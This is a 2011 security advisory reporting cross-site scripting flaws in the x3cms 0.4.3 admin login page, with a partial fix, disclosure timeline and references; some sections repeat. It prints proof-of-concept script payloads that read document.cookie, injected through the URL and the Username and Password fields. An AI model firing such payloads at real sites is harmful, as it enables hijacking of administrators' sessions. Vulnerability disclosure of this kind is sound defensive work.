INFOSERVE-ADV2011-04 - Multiple Cross-Site-Scripting vulnerabilities in x3cms
Advisory:
|
Multiple Cross-Site-Scripting vulnerabilities in x3cms
|
Advisory ID:
|
INFOSERVE-ADV2011-04
|
Author:
|
Stefan Schurtz
|
Contact:
|
|
Affected Software:
|
Successfully tested on x3cms 0.4.3 other versions may also be affected
|
Vendor URL:
|
|
Vendor Status:
|
Partial Fix
|
Secunia-ID:
|
SA46748
|
======================
Vulnerability Description
======================
x3cms 0.4.3 is prone to multiple XSS vulnerabilities
Vulnerability Description
======================
x3cms 0.4.3 is prone to multiple XSS vulnerabilities
==============
PoC-Exploit
==============
tested on IE8
http://<target>/x3cms-0.4.3-STABLE/admin/login?’"</script><script>alert(document.cookie)</script>
tested IE8 / FF 3.6.23
PoC-Exploit
==============
tested on IE8
http://<target>/x3cms-0.4.3-STABLE/admin/login?’"</script><script>alert(document.cookie)</script>
tested IE8 / FF 3.6.23
http://<target>/x3cms-0.4.3-STABLE/admin/login -> ‘Username’ field -> ‘"</script><script>alert(document.cookie)</script>
http://<target>/x3cms-0.4.3-STABLE/admin/login -> ‘Password’ field -> ‘"</script><script>alert(document.cookie)</script> |
=====
Solution:
=====
Partial Fix in Version 0.4.3.1
================
Disclosure Timeline:
================
08-Nov-2011 – Secunia SVCRP (vuln@secunia.com)
11-Jan-2012 – release date of this security advisory
====
Credits:
====
Vulnerabilities found and advisory written by the INFOSERVE Security Team
=======
References:
=======
http://secunia.com/advisories/46748/
http://x3cms.bzr.sourceforge.net/bzr/x3cms/revision/977
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-04.txt
Comments
Display comments as Linear | Threaded